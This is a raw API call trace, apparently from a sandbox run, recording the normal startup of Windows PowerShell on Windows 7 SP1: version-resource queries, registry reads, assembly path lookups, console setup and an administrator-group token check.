	[0411.655] VerQueryValueW (in: pBlock=0x2dcf388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x26dab8, puLen=0x26dab0 | out: lplpBuffer=0x26dab8*=0x2dcf500, puLen=0x26dab0) returned 1
	[0411.655] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0411.655] CoTaskMemAlloc (cb=0x2e) returned 0xc95e0
	[0411.655] lstrcpyW (in: lpString1=0xc95e0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0411.655] CoTaskMemFree (pv=0xc95e0) 
	[0411.655] VerQueryValueW (in: pBlock=0x2dcf388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x26dab8, puLen=0x26dab0 | out: lplpBuffer=0x26dab8*=0x2dcf554, puLen=0x26dab0) returned 1
	[0411.655] lstrlenW (lpString="System.Management.Automation") returned 28
	[0411.655] CoTaskMemAlloc (cb=0x3c) returned 0x1706c0
	[0411.655] lstrcpyW (in: lpString1=0x1706c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0411.655] CoTaskMemFree (pv=0x1706c0) 
	[0411.655] VerQueryValueW (in: pBlock=0x2dcf388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x26dab8, puLen=0x26dab0 | out: lplpBuffer=0x26dab8*=0x2dcf5b0, puLen=0x26dab0) returned 1
	[0411.655] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0411.655] CoTaskMemAlloc (cb=0x20) returned 0x16d340
	[0411.655] lstrcpyW (in: lpString1=0x16d340, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0411.655] CoTaskMemFree (pv=0x16d340) 
	[0411.655] VerQueryValueW (in: pBlock=0x2dcf388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x26dab8, puLen=0x26dab0 | out: lplpBuffer=0x26dab8*=0x2dcf5f0, puLen=0x26dab0) returned 1
	[0411.655] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0411.655] CoTaskMemAlloc (cb=0x44) returned 0x1706c0
	[0411.655] lstrcpyW (in: lpString1=0x1706c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0411.655] CoTaskMemFree (pv=0x1706c0) 
	[0411.655] VerQueryValueW (in: pBlock=0x2dcf388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x26dab8, puLen=0x26dab0 | out: lplpBuffer=0x26dab8*=0x2dcf658, puLen=0x26dab0) returned 1
	[0411.655] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0411.655] CoTaskMemAlloc (cb=0x76) returned 0x104ad0
	[0411.656] lstrcpyW (in: lpString1=0x104ad0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0411.656] CoTaskMemFree (pv=0x104ad0) 
	[0411.656] VerQueryValueW (in: pBlock=0x2dcf388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x26dab8, puLen=0x26dab0 | out: lplpBuffer=0x26dab8*=0x2dcf6f4, puLen=0x26dab0) returned 1
	[0411.656] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0411.656] CoTaskMemAlloc (cb=0x44) returned 0x1706c0
	[0411.656] lstrcpyW (in: lpString1=0x1706c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0411.656] CoTaskMemFree (pv=0x1706c0) 
	[0411.656] VerQueryValueW (in: pBlock=0x2dcf388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x26dab8, puLen=0x26dab0 | out: lplpBuffer=0x26dab8*=0x2dcf758, puLen=0x26dab0) returned 1
	[0411.656] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0411.656] CoTaskMemAlloc (cb=0x58) returned 0xb5060
	[0411.656] lstrcpyW (in: lpString1=0xb5060, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0411.656] CoTaskMemFree (pv=0xb5060) 
	[0411.656] VerQueryValueW (in: pBlock=0x2dcf388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x26dab8, puLen=0x26dab0 | out: lplpBuffer=0x26dab8*=0x2dcf7d4, puLen=0x26dab0) returned 1
	[0411.656] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0411.656] CoTaskMemAlloc (cb=0x20) returned 0x16d340
	[0411.657] lstrcpyW (in: lpString1=0x16d340, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0411.657] CoTaskMemFree (pv=0x16d340) 
	[0411.657] VerQueryValueW (in: pBlock=0x2dcf388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x26dab8, puLen=0x26dab0 | out: lplpBuffer=0x26dab8*=0x2dcf47c, puLen=0x26dab0) returned 1
	[0411.657] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0411.657] CoTaskMemAlloc (cb=0x66) returned 0x16c570
	[0411.657] lstrcpyW (in: lpString1=0x16c570, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0411.657] CoTaskMemFree (pv=0x16c570) 
	[0411.657] VerQueryValueW (in: pBlock=0x2dcf388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x26dab8, puLen=0x26dab0 | out: lplpBuffer=0x26dab8*=0x0, puLen=0x26dab0) returned 0
	[0411.657] VerQueryValueW (in: pBlock=0x2dcf388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x26dab8, puLen=0x26dab0 | out: lplpBuffer=0x26dab8*=0x0, puLen=0x26dab0) returned 0
	[0411.657] VerQueryValueW (in: pBlock=0x2dcf388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x26dab8, puLen=0x26dab0 | out: lplpBuffer=0x26dab8*=0x0, puLen=0x26dab0) returned 0
	[0411.657] VerQueryValueW (in: pBlock=0x2dcf388, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26da88, puLen=0x26da80 | out: lplpBuffer=0x26da88*=0x2dcf424, puLen=0x26da80) returned 1
	[0411.657] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0411.657] VerLanguageNameW (in: wLang=0x0, szLang=0xfc760, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0411.657] CoTaskMemFree (pv=0xfc760) 
	[0411.657] VerQueryValueW (in: pBlock=0x2dcf388, lpSubBlock="\\", lplpBuffer=0x26dad8, puLen=0x26dad0 | out: lplpBuffer=0x26dad8*=0x2dcf3b0, puLen=0x26dad0) returned 1
	[0411.665] CoTaskMemAlloc (cb=0x104) returned 0x16f150
	[0411.665] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x16f150, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0411.665] CoTaskMemFree (pv=0x16f150) 
	[0411.669] CoTaskMemAlloc (cb=0x104) returned 0x16f150
	[0411.669] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x16f150, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0411.669] CoTaskMemFree (pv=0x16f150) 
	[0411.673] lstrlenW (lpString="䅁") returned 1
	[0411.682] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d9a8 | out: phkResult=0x26d9a8*=0x2fc) returned 0x0
	[0411.683] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d998 | out: phkResult=0x26d998*=0x300) returned 0x0
	[0411.683] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26da28 | out: phkResult=0x26da28*=0x304) returned 0x0
	[0411.969] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d96c, lpData=0x0, lpcbData=0x26d968*=0x0 | out: lpType=0x26d96c*=0x1, lpData=0x0, lpcbData=0x26d968*=0x56) returned 0x0
	[0411.970] CoTaskMemAlloc (cb=0x5a) returned 0x16c500
	[0411.970] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d93c, lpData=0x16c500, lpcbData=0x26d938*=0x56 | out: lpType=0x26d93c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d938*=0x56) returned 0x0
	[0411.970] CoTaskMemFree (pv=0x16c500) 
	[0411.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.001] CoTaskMemAlloc (cb=0x104) returned 0x16f150
	[0412.001] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x16f150, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0412.002] CoTaskMemFree (pv=0x16f150) 
	[0413.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0413.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0414.307] CoTaskMemAlloc (cb=0x104) returned 0x17c060
	[0414.307] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x17c060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.307] CoTaskMemFree (pv=0x17c060) 
	[0414.574] CoTaskMemAlloc (cb=0x104) returned 0x17c060
	[0414.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x17c060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.574] CoTaskMemFree (pv=0x17c060) 
	[0414.605] CoTaskMemAlloc (cb=0x104) returned 0x17d190
	[0414.605] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x17d190, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.606] CoTaskMemFree (pv=0x17d190) 
	[0414.607] CoTaskMemAlloc (cb=0x104) returned 0x17d190
	[0414.607] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x17d190, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.607] CoTaskMemFree (pv=0x17d190) 
	[0414.608] CoTaskMemAlloc (cb=0x104) returned 0x17d190
	[0414.608] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x17d190, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.608] CoTaskMemFree (pv=0x17d190) 
	[0415.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0415.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0416.073] CoTaskMemAlloc (cb=0x104) returned 0x17fd40
	[0416.074] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x17fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.074] CoTaskMemFree (pv=0x17fd40) 
	[0416.077] CoTaskMemAlloc (cb=0x104) returned 0x17fd40
	[0416.077] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x17fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.077] CoTaskMemFree (pv=0x17fd40) 
	[0416.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0420.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0420.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0422.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0422.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0422.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0422.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0424.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0424.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0424.658] CoTaskMemAlloc (cb=0x104) returned 0xec600
	[0424.658] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xec600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0424.658] CoTaskMemFree (pv=0xec600) 
	[0424.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0424.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0424.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0424.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0424.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x26d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0424.691] SetErrorMode (uMode=0x1) returned 0x1
	[0424.691] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x26d900 | out: lpFileInformation=0x26d900*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0424.691] SetErrorMode (uMode=0x1) returned 0x1
	[0425.723] CoTaskMemAlloc (cb=0x104) returned 0x1b99c990
	[0425.723] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b99c990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.723] CoTaskMemFree (pv=0x1b99c990) 
	[0425.724] CoTaskMemAlloc (cb=0x104) returned 0x1b99c990
	[0425.724] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b99c990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.724] CoTaskMemFree (pv=0x1b99c990) 
	[0425.724] CoTaskMemAlloc (cb=0x104) returned 0x1b99c990
	[0425.724] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b99c990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.724] CoTaskMemFree (pv=0x1b99c990) 
	[0425.726] CoCreateGuid (in: pguid=0x26dcc8 | out: pguid=0x26dcc8*(Data1=0x92de4183, Data2=0xb7d5, Data3=0x4df0, Data4=([0]=0x90, [1]=0x61, [2]=0xf9, [3]=0x88, [4]=0x29, [5]=0x6, [6]=0xe, [7]=0xd3))) returned 0x0
	[0425.728] CoTaskMemAlloc (cb=0x104) returned 0x1b99c990
	[0425.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b99c990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.729] CoTaskMemFree (pv=0x1b99c990) 
	[0425.730] CoTaskMemAlloc (cb=0x104) returned 0x1b99c990
	[0425.730] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b99c990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.730] CoTaskMemFree (pv=0x1b99c990) 
	[0425.732] CoTaskMemAlloc (cb=0x104) returned 0x1b99c990
	[0425.732] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b99c990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.732] CoTaskMemFree (pv=0x1b99c990) 
	[0425.737] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0425.738] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x26d970 | out: lpConsoleScreenBufferInfo=0x26d970) returned 1
	[0425.743] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0426.024] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x26d970 | out: lpConsoleScreenBufferInfo=0x26d970) returned 1
	[0426.025] GetVersionExW (in: lpVersionInformation=0x26d900*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26d900*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0426.027] GetCurrentProcess () returned 0xffffffffffffffff
	[0426.027] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x26d998 | out: TokenHandle=0x26d998*=0x318) returned 1
	[0426.031] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26d8b8 | out: TokenInformation=0x0, ReturnLength=0x26d8b8) returned 0
	[0426.031] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0xc7290
	[0426.031] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0xc7290, TokenInformationLength=0x4, ReturnLength=0x26d8b8 | out: TokenInformation=0xc7290, ReturnLength=0x26d8b8) returned 1
	[0426.033] DuplicateTokenEx (in: hExistingToken=0x318, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x26da18 | out: phNewToken=0x26da18*=0x314) returned 1
	[0426.033] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26d8b8 | out: TokenInformation=0x0, ReturnLength=0x26d8b8) returned 0
	[0426.033] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0xc72c0
	[0426.033] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0xc72c0, TokenInformationLength=0x4, ReturnLength=0x26d8b8 | out: TokenInformation=0xc72c0, ReturnLength=0x26d8b8) returned 1
	[0426.034] CheckTokenMembership (in: TokenHandle=0x314, SidToCheck=0x2eaa130*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x26da28 | out: IsMember=0x26da28) returned 1
	[0426.034] CloseHandle (hObject=0x314) returned 1
	[0426.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0426.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
